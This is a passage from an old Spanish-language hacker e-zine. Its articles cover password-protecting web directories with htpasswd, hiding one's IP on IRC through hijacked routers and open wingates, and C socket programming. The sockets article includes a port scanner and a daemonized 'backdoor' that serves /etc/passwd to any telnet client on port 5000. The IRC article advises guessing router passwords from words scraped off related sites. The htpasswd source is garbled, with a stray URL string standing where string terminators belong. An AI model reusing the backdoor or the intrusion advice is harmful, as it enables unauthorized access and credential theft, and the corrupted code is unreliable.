	int     i;

	va_start(vl, str);
	memset(tmp, 0, sizeof(tmp));
	i = vsnprintf(tmp, sizeof(tmp), str, vl);
	va_end(vl);

	send(fd, tmp, i, 0);
	return;
}


Bueno, creo  que  se me ha extendido un poco esta seccion, y aun se me quedan
muchos apuntes por fuera, espero traerles algo mas en la proxima edicion.

Thanx to:

Securiteam
Bugtraq
Hispasec

Cualquier duda, aclaracion, comentario, etc, a: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

Nos vemos por ahi..!!!

Taker

"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


9. __________________________________ Como ponerle passwords a una pagina Web
                                      By Don Cucumber


mailto:
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

Hola Chicos de la R!!

Aca va mi primer  articulo.  La verdad es que todo esto partio como un simple 
mail explicando como ponerle passwords a una pagina de forma simple y como me
extendi bastante, pues bien, aca estoy escrinbiendo mi primer articulo.

Quizas algunos se enojen, porque dicen que en internet se debe tener acceso a 
todo, porque  la informacion debe  ser  libre. A  mi  gusto  eso  es  un  mal 
entendimiento  de  tal  concepto,  ya que hay veces que se debe restringir el 
acceso a ciertas cosas que transitan  por  la  gran telara~a. Te gustaria que 
leyeran tus mails, si estas mandando los codigos  de  acceso  para lanzar una 
bomba atomica? En ese caso existe PgP. Pues bien, la solucion que  doy aca es 
para las paginas Web. Las passwords quedan en un archivo encriptado, parecido 
al passwd de los sistemas Unix.

Ya, manos a la obra...

Para  tener  password  en una pagina (estoy suponiendo que tengo acceso a una 
shell) es asi:

Cabe destacar que uno no  le  da  acceso  a  una  'pagina',  sino  que  a  un 
directorio, por lo que si quiero poner password a solo una parte de mi sitio, 
pongo lo 'secreto' en un directorio aparte:

Si tengo mi pagina en:
/home/cucumber/pub_www/

Entonces creo:
/home/cucumber/pub_www/secreto/

En este directorio pongo los siguientes archivos:

1.- .htaccess . Este es un archivo de texto y es asi:
*********
AuthType Basic
AuthName Cucumber's Page
AuthUserFile /home/cucumber/pub_www/secreto/PasswdFile


require valid-user

******

Aca  le  dice de donde sacar las passwords encriptadas (en este ejemplo es de
PasswdFile,  pude  tener  cualquier  nombre, pero  debe estar contenido en el 
directorio a 'proteger').

2.- htpasswd . este archivo es un archivo binario  que  debes  compilar en tu
maquina. El codigo lo voy a poner al final de este articulo.

Para compilarlo es facil:

a.- Copias el arcivo htpasswd.c al directorio a proteger
(/home/cucumber/pub_www/secreto/)

b.- Lo compilas. Esto se hace asi:

% gcc -o htpasswd htpasswd.c

Con  el  '-o'  le  asignas  nombre   al  ejecutable,  puede  ser  cualquiera,
pero lo recomendable es que sea igual  al *.c por lo general, en este caso se 
deberia llamar htpasswd.

c.- Si  quieres  borras  el  *.c, ya no tiene ninguna utilidad, ya que el que
importa es el binario.

d.- Revisas  que  el binario tenga  permisos  de  ejecucion (-r-x------  como
minimo). Si no lo tiene o no tienes ni idea, puedes hacer esto:

[/home/cucumber/pub_www/secreto/]% chmod u+x htpasswd

Con eso le das permisos de ejecucion.

3.- Como crear cuentas.

Para que puedan entrar  a  tu directorio protegido, debes crear cuentas desde 
la linea de comandos, esto se hace asi:


[/home/cucumber/pub_www/secreto/]% htpasswd -c PasswdFile visita

Analicemoslo por partes:

a.- htpasswd: El binario a ejecutar.

b.- '-c': Esto se usa SOLO  la primera vez que ejecutas el comando (o primera
vez que guardas passwords en el archivo con el nombre que va a continuacion). 
La 'c' es para crear este archivo.

c.- PasswdFile: Es donde se  van  a  guardar  las passwords encriptadas. Este
archivo debe ser el mismo que el que esta especificado en el archivo 
.htaccess en la linea:

AuthUserFile /home/cucumber/pub_www/secreto/PasswdFile

d.- visita: username que le asigno yo a ese usuario.

Despues de esto te pide el passwd que le quieres  asignar, la pones dos veces 
y listo, tu pagina tiene password.

Ojo:  Las   passwords  deben  ser  complicadas, cosa  que  no  esten  en  los 
diccionarios,  para  que  no  puedan  crackeartela,   ya   que   ese  archivo 
(PasswdFile) podra verlo cualquier persona  que  este en la misma maquina que 
tu. La forma  de  crackear  estas  passwords es identica al metodo usado para 
crackear las passwords de los sistemas Unix.


************* htpasswd.c ********
/*
 * htpasswd.c: simple program for manipulating password file for NCSA httpd
 *
 * Rob McCool
 */

#include 
#include 
#include 
#include 
#include 
#include 

#define LF 10
#define CR 13

#define MAX_STRING_LEN 256

char *tn;

char *strd(char *s) {
		char *d;

		d=(char *)malloc(strlen(s) + 1);
		strcpy(d,s);
		return(d);
}

void getword(char *word, char *line, char stop) {
		int x = 0,y;

		for(x=0;((line[x]) && (line[x] != stop));x++)
	word[x] = line[x];

		word[x] = '{jumi [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]}';
		if(line[x]) ++x;
		y=0;

		while(line[y++] = line[x++]);
}

int getline(char *s, int n, FILE *f) {
		register int i=0;

		while(1) {
	s[i] = (char)fgetc(f);

	if(s[i] == CR)
			s[i] = fgetc(f);

	if((s[i] == 0x4) || (s[i] == LF) || (i == (n-1))) {
			s[i] = '{jumi [*3] [http://www.govannom.org/e-zines/proyector/proyecto_r7.txt]}';
			return (feof(f) ? 1 : 0);
	}
	++i;
		}
}

void putline(FILE *f,char *l) {
		int x;

		for(x=0;l[x];x++) fputc(l[x],f);
		fputc('\n',f);
}

/* From local_passwd.c (C) Regents of Univ. of California blah blah */
static unsigned char itoa64[] =         /* 0 ... 63 => ascii - 64 */
	"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

to64(s, v, n)
	register char *s;
	register long v;
	register int n;
{
		while (--n >= 0) {
	*s++ = itoa64[v&0x3f];
	v >>= 6;
		}
}

char *crypt(char *pw, char *salt); /* why aren't these prototyped in include
*/

void add_password(char *user, FILE *f) {
		char *pw, *cpw, salt[3];

		pw = strd(getpass("New password:"));
		if(strcmp(pw,getpass("Re-type new password:"))) {
	fprintf(stderr,"They don't match, sorry.\n");
	if(tn)
			unlink(tn);
	exit(1);
		}
		(void)srand((int)time((time_t *)NULL));
		to64(&salt[0],rand(),2);
		cpw = crypt(pw,salt);
		free(pw);
		fprintf(f,"%s:%s\n",user,cpw);
}

void usage() {
		fprintf(stderr,"Usage: htpasswd [-c] passwordfile username\n");
		fprintf(stderr,"The -c flag creates a new file.\n");
		exit(1);
}

void interrupted() {
		fprintf(stderr,"Interrupted.\n");
		if(tn) unlink(tn);
		exit(1);
}

main(int argc, char *argv[]) {
		FILE *tfp,*f;
		char user[MAX_STRING_LEN];
		char line[MAX_STRING_LEN];
		char l[MAX_STRING_LEN];
		char w[MAX_STRING_LEN];
		char command[MAX_STRING_LEN];
		int found;

		tn = NULL;
		signal(SIGINT,(void (*)())interrupted);
		if(argc == 4) {
	if(strcmp(argv[1],"-c"))
			usage();
	if(!(tfp = fopen(argv[2],"w"))) {
			fprintf(stderr,"Could not open passwd file %s for writing.\n",
				argv[2]);
			perror("fopen");
			exit(1);
	}
	printf("Adding password for %s.\n",argv[3]);
	add_password(argv[3],tfp);
	fclose(tfp);
	exit(0);
		} else if(argc != 3) usage();

		tn = tmpnam(NULL);
		if(!(tfp = fopen(tn,"w"))) {
	fprintf(stderr,"Could not open temp file.\n");
	exit(1);
		}

		if(!(f = fopen(argv[1],"r"))) {
	fprintf(stderr,
		"Could not open passwd file %s for reading.\n",argv[1]);
	fprintf(stderr,"Use -c option to create new one.\n");
	exit(1);
		}
		strcpy(user,argv[2]);

		found = 0;
		while(!(getline(line,MAX_STRING_LEN,f))) {
	if(found || (line[0] == '#') || (!line[0])) {
			putline(tfp,line);
			continue;
	}
	strcpy(l,line);
	getword(w,l,':');
	if(strcmp(user,w)) {
			putline(tfp,line);
			continue;
	}
	else {
			printf("Changing password for user %s\n",user);
			add_password(user,tfp);
			found = 1;
	}
		}
		if(!found) {
	printf("Adding user %s\n",user);
	add_password(user,tfp);
		}
		fclose(f);
		fclose(tfp);
		sprintf(command,"cp %s %s",tn,argv[1]);
		system(command);
		unlink(tn);
}

******* Aqui Acaba...*********

Bueno, eso  es  todo por esta vez y espero que les haya gustado, ya que es mi 
primer articulo en una EZine.

Un saludo  a todos los chicos de pr-all, que por estos dias anda excelente, a 
diferencia de  la otrora gran raredudez... una lastima... un gran saludo a la 
distancia a GuyBrush y PaTa, espero que esten leyendo. 

Chau!


"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

10. ________________________________________ Condon por irc a travez del mirc 
                                             By magis


Holas  soy yo otra vez, esta vez escribo un informativo sobre condonearse por 
irc a travez  del  mirc,  esto  es  basicamente  como  un  spoofing ya que su 
finalidad es que nos conectemos a irc mintiendo nuestra ip  pero  no a travez 
de un bouncer si no que haciendolo en el mirc con  simples  comandos... bueno 
la finalidad de esto es evitar que vean nuestro ip.   

Que  beneficios  trae  esto?.  por  ejemplo  evitar que nos esten nukeando en 
servidores  que delaten nuestra ip ya que en vez de nuestra ip saldra el host 
del server  al  cual  estamos  condoneando jeje, tambien evitaremos que admin 
maracos que nos cachen en una  conversacion media ilegal puedan saber nuestro 
ip y asi  con  gestiones  sucesivas puedan averiguar nuestro paradero.. je je  
pero eso igual es dificil que suceda pero filo.

Ok voy a  empezar  con  la raiz de la problematica, quizas algunos de ustedes 
conocian esto a travez de  la  opcion  firewall  que  trae  el mirc, si no la 
conocen filo y si la conocen ya sabran  que  es  bastante  restringida ya que 
solamente funciona por el port 1080  bueno esto basicamente lo haremos por el 
port 23 je, ya se estaran preguntando .. el 23 es para telnet mmmm.. bueno en 
realidad lo que estaremos  haciendo es conectarnos por telnet a un servidor a 
travez del mirc y desde  este server hacer la coneccion a irc jej, simple no,
... shiaaaaa

Ok para esto tendremos  que  conectarnos a un server wingate o a un router ya 
que aun no descubro como hacer la coneccion a una shell normal que pida login 
y passwd  a  travez  del  mirc  pero  a travez del router o el wingate no hay 
problema jeje

Bien ahora primero describire la conexion a travez del router

a) Atravez de un router:

Lo primero  es  tener  acceso  a un router.... jej ustedes se preguntaran que 
mierda es un router.. ok aca  dare  una  breve  descripcion  de  lo  que  es. 
la  carateristica  de  estas  maquinas  que son redirigidores de paquetes ip,  
realmente no veo la importancia de dar una  explicacion  de estas maquinas en 
este articulo y si quieren saber busquen en inet, jej no sean flojos, pero la 
importancia que estas maquinas es que  para ingresar  solo  piden  passwd  de 
entrada lo que hace mas  facil  hackearlas.. una ayuda a esto es hacerle a la 
ip o al host del  router  un traceroute asi ver la maquina mas cercana a este 
que  seria  el  server  due~o  de ester router.. y asi visitar la web de este 
server  (si  es  que  tiene) y anotar palabras, nombres, logins de mails, etc 
para asi probarlas como  passwd  para este router, de esta manera tendras mas 
posibilidades para encontrar un  passwd  de  acceso  a este router(no es 100% 
segura esta forma .. esto es solo una sugerencia) y la otra gran importancia, 
que estas maquinas no tienen disco duro que registre  logs  y los unicos logs 
que  quedan, estan  el la  memoria  ram  la  cuales  varian  con  los accesos 
posteriores por lo cual lo hace un exelente condon.

Ok suponiendo que  tenemos un acceso a este router jeje podremos hacer muchas 
cosas  pero  lo  que importa en este articulo es el spoofing por irc a travez 
del  mirc, tonces  prenderemos  nuestro script de irc por default pondre como 
ejemplo el mirc pos o el fabuloso script netstorm:

Lo primero  es  situarnos  en  la  ventana  status que es la primera que sale 
cuando partes el programa y excribes ahi:

/server router:23  

Aca  el  router lee el ip o host del router al cual nosotros tenemos acceso o 
el cual deberas consegir.

luego deberemos ingresar el passwd del router de la siguiente forma

/quote passwd      

Aca "passwd" es  la  pabra passwd que deberemos tener para ingresar al router

Aca deberiamos estar  conectados  al  router  y  lo  que  viene  es  hacer la 
coneccion al irc que es una simple y tipica  coneccion  a  irc  a  travez  de 
telnet que se hace de la siguiente manera:

/quote telnet irc.server 6667  

Aca  "irc.server" es el nomre del servidor  de irc que queremos conectarnos y 
"6667" es el port de coneccion que requiere este server para su coneccion, el 
cual puede variar a 7000, 6666,  etc,  o  puede usar todos estos puertos a la 
vez, todo esto depende del server.

aca empezariamos  nuestra  coneccion  a irc lo que viene es ingresar nuestros 
datos:

/quote nick nick       

Aca nick es el nick que ocuparemos para conectarnos a irc.

/quote user yo master poto pico 

Aca "yo" es el ident nuestro, "master" es nuestro nombre, y poto y pico no se 
que son pero es nesesario poner cuatro palabras diferentes en este comando.

De esta forma estariamos conectados a irc spofeado y cuando te hagan un whois 
lo que saldra sera segun  este ejemplo que di seria : ~yo@router ("router" es 
el host del router que te conectaste). un ejemplo real seria:  

~
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


b) A travez de un wingate:

Bueno, la gracia de un  wingate es que para entrar a esta maquina no nos pide 
ni  login  ni passwd y a  cambio  de  eso  nos  conecta  automaticamente.. si 
nosotros  tenemos  un host  o  ip  de  un  wingate  al  hacerle  telnet o sea 
conectarnos al port 23 saldria un promp asi:

WINGATE>

Ok, si tiene el host o ip de un wingate vacan si no hay que  conseguir uno... 
para esto existen programas que scanean subnets asi con  el  fin de hallar un 
computador con el port 23 abierto y te  tire  un  prompt  asi "wingate>", una 
alternativa a esto es el "Wgatescan"  para windoze, en linux hay tambien gran 
variedad pero aca  estamos  basandonos  en windoze ya que el articulo es para 
spofearse a  travez de mirc que es un programa de windoze,, jej eso no quiere 
decir  que  linux  sea  malo, al contrario para todo esto es mucho mejor pero 
esta wea esta dedicada para  todo  publico y la realidad que la mayoria de la 
gente usa windoze.. jeje ok volvamos al tema.. 

Bueno si no encuentran el Wgatescan,  el  script  para irc "netstorm" lo trae 
incluido asi que comunicate conmigo para obtenerlo...

Ok supongamos que ya tienes el host de un  wingate  tonces manos a la obra...
como siempre nos situamos en una  ventana del mirc, por exelencia la pantalla 
status, y ahi hacemos los procedimientos:

/server wingate:23               

Aca "wingate" es el host o ip del wingate.

Aca  nos  conectaremos  al  wingate  y  aca  en  el siguiente comando esta la 
diferencia con la coneccion con el router

/quote irc.server 6667  

Si se dieron cuenta son perceptivos.. si no eres imbecil jeje(broma) bueno si 
se fijan aca no se incluyo el comando telnet que salia en la coneccion con el 
router que era este "/quote telnet irc.server 6667" je,  ven  la  diferencia, 
jej esto pasa por que un wingate es una maquina que especificamente se dedica 
a hacer puentes con otro server, dicho de manera  facil de entender o sea que 
haciendole telnet nos va  a  salir  el  prompt "wingate>" tonces aca nosotros 
podemos conectarnos a otro server con solo poner el host o ip del server.

En ejemplo de esto es: 

"wingate>pico.cl"  pico.cl es una wea salida de mi maltrecha maginacion. jeje 
asi  nos  conectariamos  a  pico.cl, lo  demas  es  lo  mismo explicado en el 
ejemplo del router o sea irc.server  el server de irc al  cual  nos  queremos 
conectar .. etc)

Aca  nos  conectaremos  al server de irc y lo que resta es lo mismo que en el 
ejemplo de router

/quote nick nick

/quote user yo master poto pico

Pdt: en  los  dos  casos  que  hemos visto el comando quote que puse se puede 
reemplazar por el comando raw .. haganlo como puta se les de la gana.

Finalemente de esta manera nos hemos conectado a irc spofeados por un wingate
y cuando nos hagan un whois saldra algo  asi :

~yo@wingate  >> aca  wingate  sera el host del wingate al cual nos conectamos

Ok ya tiene  hacer  la  herramientas  para hacer sp00fing por mirc, si tienes 
informacion sobre routers o wingates o nesesitas hacer  una  consulta,  o  si 
sabes como hacer esto pero por una cuenta shell  normal ya que en realidad no 
se como ingresar el login y passwd  para  poder  conecaterme al server ya que 
para esto el comando quote como  la opcion del router que hay que ingresar el 
passwd no sirve y he intentado las mil y pitas formas sin exito..

Comuniquence  conmigo  a  
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 , o  en irc.reuna.cl  que  me 
pueden hallar por el nick  magis o magistelus

ya chao
je

Saludos   a   mis  compa~eros  de   netstorm,  underchile,  nterror,  darkcl, 
trivial_hk, y a todos los que me  conocen y una chuchada al conchesumadre del 
teku que yo por buena onda le regale un router y el aweonao con sus movias de 
mierda  le  cambio el ircd a lala.org >>>>> la wea lamer no creen ....chupalo 
teku  reculiao,  lamer  de  mierda,  pitutero culaio, sin tus pitutos no eres 
nadie... jeje  

Ahora si chao


"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*


11. ____________________________________________________ Programando en Linux
                                                         By AndyK


Hace bastante tiempo ten¡a la  inquietud  de  como poder hacer programas para
linux en los ke pudiese  conectarme a servidores o cosas por el estilo. Bueno
a  trav‚s  de  esta  inquietud fu‚ que decid¡ comenzar a buscar informaci¢n y
aqu¡  les presento alguna de las cosas ke se pueden hacer y bueno m s ke nada
darles el  empuj¢n inicial para ke puedan continuar este maravilloso mundo de
la programaci¢n..... El  lenguaje a utilizar no va a ser otro m s ke el archi
conocido C. Es necesario que  ojala  tengas  conocimientos  b sicos  de  este
lenguaje.... (hay muchos  manuales  por  ah¡ que hablan del tema). No soy por
ning£n motivo un experto en C pero creo ke  no  es necesario serlo para hacer
esto, dem s esta decir que cualquier error que cometa pueden hacermelo saber.

Esta vez mostrar‚ algunos ejemplos sobre programaci¢n  de  sockets (crear  un
cliente, servidor) como  complemento  al  texto  ya  escrito sobre sockets en
una  R  anterior,  y  como  hacer  ke  tu  programa  corra  como  un  demonio
(esto lo explico m s tarde). 


Un  t¡pico  ejemplo  de un cliente es el siguiente programa que se conecta al
puerto 80 de un servidor para obtener informaci¢n sobre el WEBSERVER.

/*      WEBQUERY V1.0
	Programa creado por AnDyK
	Te da informaci¢n acerca del servidor web de un host determinado
	Compilar usando: gcc -o webquery webquery.c
	Uso: webquery hostip
*/
 
#include 
#include 
#include 
#include 
#include 

#define HOST "127.0.0.1"

main(int argc, char *argv[])
{
	int sock;

	char buff[1024];
	struct sockaddr_in client;


	sock = socket (AF_INET, SOCK_STREAM, 0);    
	client.sin_family = AF_INET;
	client.sin_port = htons(80);               
	client.sin_addr.s_addr = inet_addr(argv[1]);  
	bzero(&(client.sin_zero), 8);
	connect (sock, (struct sockaddr *)&client, sizeof(client));
	send (sock, "HEAD / HTTP/1.0\n\n",17,0);
	recv (sock, buff, sizeof(buff),0);
	printf("RESPUESTA:\n %s \n", buff);
	close (sock);
	return(0);
}

Estoy  seguro  que muchos de ustedes m s de alguna vez han usado un portscan.
Bueno ahora les  muestro uno muy simple, con el fin de ke puedan darse cuenta
de las diferentes cosas ke pueden hacer.....


/* Program Created By AnDyK. CDLR Pro Hackers DOMAIN
	Compilar usando: gcc -o pscan pscan.c
	Este es solo un ejemplo de programacion de Sockets
	Cualkier consulta a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
*/

#include 
#include 
#include 
#include 

#define MESSAGE "\n"

main(int argc, char *argv[])
{
	int sock;
	struct sockaddr_in client;
	char buf[1028];
	int port=1;
	if ((argc) != 2)
		{
		printf("Uso: \n    %s iphost\n\n", argv[0]);
		exit(-1);
		}
	printf("Portscan for Linux\nCreated By AnDyK.\nCDLR\n");
	for(port=1;port<65536;port++)
	{ 

	if ((sock=socket(AF_INET, SOCK_STREAM, 0)) < 0)
		{ 
		printf ("Error al crear Socket.\n");
		exit(-1);
		}

	client.sin_family = AF_INET;
	client.sin_addr.s_addr = inet_addr(argv[1]);
	client.sin_port = htons(port);
	bzero(&(client.sin_zero), 8);
	if ((connect(sock, (struct sockaddr*)&client, sizeof(client))) > -1)
		{
		printf("Puerto %d ABIERTO \n", port);
		}
	close(sock);

	} 
}


Bueno  ya  con estos dos ejemplos espero les haya quedado claro el como crear
un cliente (recueden leer el art¡culo anterior, si es ke no lo han hecho).

Estos son los  primeros  programas  que  se me ocurrieron crear, como ven son
bastante simples, creo ke seguir‚ mostrando mis primeras creaciones.

Una vez que cree estos programas recuerdo  ke me dije AHORA A CREAR UN SERVER
(teniendo la esperanza de alg£n d¡a  crear  un buen backdoor.... uuppss bueno
ke esto kede en secreto!!!!!!!!).

Ke tal un programa ke al conectarse  a  trav‚s  de  una  aplicaci¢n de telnet
me muestre /etc/passwd ... (esto es  solo  un  ejemplo... podr¡a  haber  sido
cualkier otro archivo jejejje). Bueno aki va:

/* Program Created By AnDyK. CDLR Pro Hackers DOMAIN
	Compilar usando: gcc -o bd bd.c
	Este es solo un ejemplo de programacion de Sockets
	Cualkier consulta a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
	Para conectarse hacer telnet al puerto 5000
*/


#include 
#include 
#include 
#include 
#include 

#define PORT 5000 
#define PROMPT "BACKDOOR ??????\n"

FILE *file;
char *name = "bd.log";

int main(int argc, char **argv)
{
	int sock, csock;
	struct sockaddr_in server, client;
	char buf[1028];
	char buf2[4096];

	if ((sock=socket(AF_INET, SOCK_STREAM, 0)) < 0)
		{ 
		printf ("Error al crear Socket.\n");
		exit(-1);
		}

	server.sin_family = AF_INET;
	server.sin_addr.s_addr = htonl(INADDR_ANY);
	server.sin_port = htons(PORT);
	
	if ((bind(sock, (struct sockaddr*)&server, sizeof(server))) < 0)
		{
		printf("No se pudo bindear al puerto %d \n", PORT);
		exit(-1);
		}

	listen (sock, 5);
	for(;;)
		{
		if ((csock = accept(sock, (struct sockaddr*)&client, (int *)sizeof(client))) < 0)
			{
			printf("UHmmm.. no pude aceptar la conexion");
			exit(-1);
			}

			if ((send(csock, (void *)PROMPT, sizeof(PROMPT), 0)) < 0)
				{
				printf("No se pudo enviar\n");
				exit(-1);
				}
		if ((system("cat /etc/passwd >bd.log"))<0)
			{
			printf("No se pudo crear el archivo\n");
			exit(-1);
			}
		if ((file=fopen(name, "r"))==NULL)
			{
			printf("No se pudo abrir el archivo\n");
			exit(-1);
			}
		if ((fread(buf2,4092,1,file)) < 0)
			{
			printf("No se pudo leer el archivo\n");
			exit(-1);
			}
		if ((send(csock, (void *)buf2, sizeof(buf2), 0)) < 0)
			{
			printf("No se pudo enviar el file\n");
			exit(-1);
			} 
		if ((recv(csock, (void *)buf, sizeof(buf), 0)) < 0)
			{
			printf("No se ppudo recibir");
			exit(-1);
			}
		printf ("%s",buf);
				
		close(csock);
		}
}

En  realidad  este  programa  no  es  muy  £til...  como  podr n  observar al
ejecutarlo ver n ke la sesi¢n keda inutilizada esperando  por  conexiones....
Aqu¡ viene la  parte  interesante  de  este  art¡culo... La pregunta ke yo me
hice  fue  el  como  poder  hechar  a  andar  el programa y ke kede residente
pudiendo yo hacer cualkier otra  cosa  desde la misma  sesi¢n.... y  m s  aun
ke el programa siga corriendo una vez ke yo he cerrado la sesi¢n....

Pues  bueno,  gracias  a  un  gran  libro  "Unix  Network  Programming" de un
autor ke no recuerdo.. encontre la respuesta a mi interrogante.

En el encontre la teor¡a de los demonios y como poder crearlos....

En  la  pr ctica  lograremos  ke  el  mismo  programa  anterior funcione algo
as¡ como los programas residentes  en  memoria  (TSR)  de  DOS  esperando por
una conexi¢n.

En teor¡a se hace uso de la funci¢n? fork() de C ke crea un proceso hijo.

En  realidad  teoricamente  no entiendo bien como funciona pero pr cticamente
evidente. Tratar‚ de explicarlo al menos como yo lo entiendo:

Al correr el programa se crea un proceso padre.
El programa crea un proceso hijo (fork).
El hijo mata al padre (exit).
El hijo se hace pasar por el padre (setpgrp)
El hijo borra cualkier evidencia
El hijo tiene otro hijo.
Este otro lo mata y finalmente le pasa el control al resto del programa.

Uppsss creo  ke  esta un tanto  confuso... en realidad no me gusta meterme en
problemas familiares asi ke mejor dejemoslo as¡.

El siguiente  c¢digo  ke  mostrar‚  es  algo as¡ como el eskeleto de cualkier
programa ke kiera usar esta tecnica, lo £nico  ke  debes  hacer  es  llamar a
este procedimiento desde la funci¢n main(). Bueno esto kedar   claro  con  el
ejemplo del programa servidor anterior.

/*Extraido de Unix Network Programming y
	modificado por AnDyK*/

daemon_start(ignsigcld)
int ignsigcld;
{
	register int childpid, fd;
	if (getppid()==1)
		goto out;
		

	#ifdef SIGTTOU
		signal(SIGTTOU, SIG_IGN);
	#endif
	#ifdef SIGTTIN
		signal(SIGTTIN, SIG_IGN);
	#endif
	#ifdef SIGTSTP
		signal(SIGTSTP, SIG_IGN);
	#endif

	if ((childpid=fork()) < 0)
		{
		printf("No pude crear al hijo");
		exit(-1);
		}
	else if (childpid > 0)
		exit(0);

	if (setpgrp() == -1)
		{
		printf("No pude suplantar a mi padre");
		exit(-1);
		}
	signal(SIGHUP, SIG_IGN);
	if ((childpid = fork()) < 0)
		{
		printf("hijo:no pude hacer ke mi papi tenga nietos");
		exit(-1);
		}
	else if (childpid > 0)
		exit(0);
out:
	for (fd=0;fd
 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
	Para conectarse hacer telnet al puerto 5000
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

extern int errno;

daemon_start(ignsigcld)
int ignsigcld;
{
	register int childpid, fd;
	if (getppid()==1)
		goto out;
		

	#ifdef SIGTTOU
		signal(SIGTTOU, SIG_IGN);
	#endif
	#ifdef SIGTTIN
		signal(SIGTTIN, SIG_IGN);
	#endif
	#ifdef SIGTSTP
		signal(SIGTSTP, SIG_IGN);
	#endif

	if ((childpid=fork()) < 0)
		{
		printf("can't fork first child");
		exit(-1);
		}
	else if (childpid > 0)
		exit(0);

	if (setpgrp() == -1)
		{
		printf("can't change process group");
		exit(-1);
		}
	signal(SIGHUP, SIG_IGN);
	if ((childpid = fork()) < 0)
		{
		printf("can't fork second child");
		exit(-1);
		}
	else if (childpid > 0)
		exit(0);
out:
	for (fd=0;fdbd.log"))<0)
			{
			printf("No se pudo crear el archivo\n");
			exit(-1);
			}
		if ((file=fopen(name, "r"))==NULL)
			{
			printf("No se pudo abrir el archivo\n");
			exit(-1);
			}
		if ((fread(buf2,4092,1,file)) < 0)
			{
			printf("No se pudo leer el archivo\n");
			exit(-1);
			}
		if ((send(csock, (void *)buf2, sizeof(buf2), 0)) < 0)
			{
			printf("No se pudo enviar el file\n");
			exit(-1);
			} 
		if ((recv(csock, (void *)buf, sizeof(buf), 0)) < 0)
			{
			printf("No se ppudo recibir");
			exit(-1);
			}

				
		close(csock);
		}
}


*****************************************************************************
                               AKI TERMINA
*****************************************************************************

Como pueden ver en realidad ustedes  pueden usar el esqueleto en cualkiera de
sus programas. Es claro mencionar ke este programa est  dise¤ado para Linux..
para Unix solo hay ke realizar unas peque¤as modificaciones.

No se si  ustedes  se  dan  cuenta  de  lo  importante ke es esto.... pero en
realidad  se  me  ocurren  varias  ideas mientras escribo esto.... uhm ke tal
hacer un..... o ..... Aprovecho de  insentivarlos  en aprender a programar, y
as¡ no tendr s ke esperar a ke un desconocido cree  esos  programas  ke tanto
te imaginas.... no sean flojillos. Adem s podr n cooperar en nuestra  seccion
de C¢digo Fuente en nuestra reci‚n inaugurado servidor.

A se me olvidaba. suponiendo ke has creado este programa y  lo  has  probado,
para desactivarlo (por decirlo de alguna manera), basta  con apagar el server
o ejecutar 'ps' para ver la id del proceso y luegos lo kileas con 'kill id'.

Ahora me despido deseando que ojala esto les  sirva  de  algo... y no olviden
contactarme ante cualkier duda, reclamo,  etc.... los insultos uhmmm ke tal a
/etc/passwd ????

Bye
AnDyK
CDLR Pro Hackers Domain



"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*
"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*"*:._.*

12. ______________________________________________ Scripts de Inicio en Linux
                                                   By Taker


La verdad no soy un experto en Linux, es mas, llevo pocos meses utilizandolo,
antes  tenia  el  Red  Hat  4.x  ya  ni me acuerdo, ahora estoy con el RH 6.0
acabado de sacar del Horno, y me he  puesto en la tarea de investigar un poco
sus archivos, esta vez voy a hablar  sobre  algunos  archivos que me llamaron
la atencion, son los que se encuentran en: /etc/rc.d

La  mayoria  por no decir todos son scripts que se corren a la hora de inicio
del sistema, y se encargan de activar algunos servicios, bueno, ya veremos de
que se trata toda esta vaina, primero veamos cuales son:

les coloco el resultado de la orden ls -all:

[root@localhost rc.d]# ls -alltotal 26
drwxr-xr-x  10 root     root         1024 Aug 10 22:30 .
drwxr-xr-x  30 root     root         3072 Aug 10 21:44 ..
drwxr-xr-x   2 root     root         1024 Aug  7 18:41 init.d
-rwxr-xr-x   1 root     root         2722 Apr 15 08:53 rc
-rwxr-xr-x   1 root     root          693 Aug 17  1998 rc.local
-rwxr-xr-x   1 root     root         9822 Apr 13 19:05 rc.sysinit
drwxr-xr-x   2 root     root         1024 Aug  7 18:43 rc0.d
drwxr-xr-x   2 root     root         1024 Aug  7 18:43 rc1.d
drwxr-xr-x   2 root     root         1024 Aug  7 18:43 rc2.d
drwxr-xr-x   2 root     root         1024 Aug  7 18:43 rc3.d
drwxr-xr-x   2 root     root         1024 Aug  7 18:43 rc4.d
drwxr-xr-x   2 root     root         1024 Aug  7 18:43 rc5.d
drwxr-xr-x   2 root     root         1024 Aug  7 18:43 rc6.d

Ahora  veamos  como  trato  de  darles  una explicacion sobre estos archivos,
espero que me entiendan, porque a veces ni yo mismo lo hago. ;)

rc-local:

En  mi  caso, y supongo que en todos los que utilicen Red Hat 6.0 este script 
corre despues  de  todos  los  otros script de inicializacion y se encarga de 
cambiar en cada Booteo de la maquina el Mensaje que aparece al hacerle telnet 
